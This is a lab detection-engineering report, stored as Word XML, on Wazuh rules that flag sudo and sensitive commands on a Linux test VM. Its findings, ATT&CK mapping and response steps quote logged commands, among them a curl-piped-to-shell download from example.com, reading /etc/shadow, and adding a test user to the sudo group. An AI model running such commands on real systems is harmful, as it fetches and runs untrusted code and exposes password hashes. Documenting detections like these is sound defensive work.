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482"/>
        </w:rPr>
        <w:t>LINUX SOC DETECTION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Detection 006 — Sudo Abuse &amp; Sensitive Command Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Wazuh • Linux • sudo / authentication logs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Detection validated; analyst review required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sudo activity detected; abuse not confirmed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ubuntu_vm2 / 192.168.34.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Wazuh Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vm1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>100520 / 100521 / 100522 (query)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17 October 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Vipin Kumar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Wazuh search rule.id:(100520 OR 100521 OR 100522) showed 234 hits in the selected one-week period. The supplied event details confirm Level 5 sudo-activity alerts from rule 100520 and Level 9 high-risk command alerts from rule 100521. Commands include account management, a sudo-group change, reading /etc/shadow, administrative checks, root identity tests, and a curl-to-shell attempt. The evidence validates monitoring, but does not establish malicious intent or compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wazuh manager: vm1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Linux endpoint: ubuntu_vm2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Endpoint IP: 192.168.34.143</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Agent ID: 001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Log source: /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dashboard query: rule.id:(100520 OR 100521 OR 100522)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Selected range: Last week, 10–17 October 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>100520 — Sudo command executed as root, Level 5, mapped to T1548.003.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>100521 — Sudo used with a sensitive/high-risk command, Level 9, mapped to T1548.003 and T1078.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>100522 — Included in the screenshot query, but the supplied evidence does not document its description or specific alert. Do not assign it a behavior until the XML/sample alert is reviewed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Account Administration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Between 13:58 and 14:00 local time, the logs show useradd testuser_basic, useradd -m -s /bin/bash testuser_sudo, usermod -aG sudo testuser_basic, and userdel commands for both test accounts. These look consistent with lab account-management tests, but adding a user to the sudo group is security-sensitive. Verify the action and cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Sensitive Command Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>At approximately 14:22:52 local time, rule 100521 alerted on sudo /usr/bin/cat /etc/shadow. The file contains password-hash data and deserves review. The alert confirms the command was logged, not that data was exfiltrated. At 14:22:13, the same rule alerted on visudo -c; the terminal reports /etc/sudoers: parsed OK. At 14:23:32, it alerted on systemctl status ssh, which is often routine administration. At about 14:30:46, it alerted on crontab -l; the terminal notes no crontab for root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Root Execution Tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Rule 100520 logged su -c whoami twice and python3 invoking whoami twice. The supplied terminal shows whoami returning root. This confirms the commands ran in a root context through sudo; it is not by itself evidence of malicious privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Remote Content Pipeline Attempt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>At 14:26:29, rule 100520 logged sudo bash -c "curl -s http://example.com | sh". The supplied terminal output says: sh: 1: Syntax error: redirection unexpected. Therefore, the available evidence does not prove that content was downloaded or executed. Correlate network and child-process telemetry if needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Dashboard Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The supplied dashboard query includes rules 100520, 100521, and 100522 and displays 234 hits in the last-week range. It shows Level 5 and Level 9 rule activity and ATT&amp;CK labels for Sudo and Sudo Caching and Valid Accounts. The 234 hits are alert documents and may include repeated routine commands; they are not necessarily 234 distinct incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching. T1078 — Valid Accounts (included in rule 100521 metadata). These mappings are investigative context, not proof of abuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Findings and Verdict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Confirmed: Wazuh collected sudo activity and generated 100520 and 100521 alerts; sensitive-command activity included /etc/shadow access and modification of sudo group membership. Not confirmed: malicious intent, successful remote script execution, data exfiltration, persistence, or endpoint compromise. Verdict: sudo monitoring detections validated; command intent and execution outcome require context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. Recommended Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Confirm all commands were part of authorized lab testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. Verify whether testuser_basic was intentionally added to the sudo group and whether account cleanup completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. Review /etc/shadow access and correlate with audit, login, and account-change events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. For the curl-to-shell attempt, check network and process telemetry; do not assume it succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5. Treat visudo -c and systemctl status ssh as context-dependent administrative commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>6. Review exact XML and test rule 100520/100521 against benign and sensitive commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>7. Obtain the rule XML and a sample alert for 100522 before documenting that rule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Limitations and Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The exact XML for rules 100520–100522 was not supplied; no sample alert for rule 100522 was provided. The dashboard count may include repeats. The supplied terminal indicates a syntax error for the curl-to-shell attempt, so successful remote execution is unconfirmed. This is a useful lab detection-engineering result, not a confirmed compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A — Evidence Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E01-sudo-detection-dashboard.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5715000" cy="3239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-sudo-detection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E02-sudo-alert-search-results.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5715000" cy="335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-sudo-alert-search-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E03-sensitive-command-alert-details.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5715000" cy="47908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-sensitive-command-alert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908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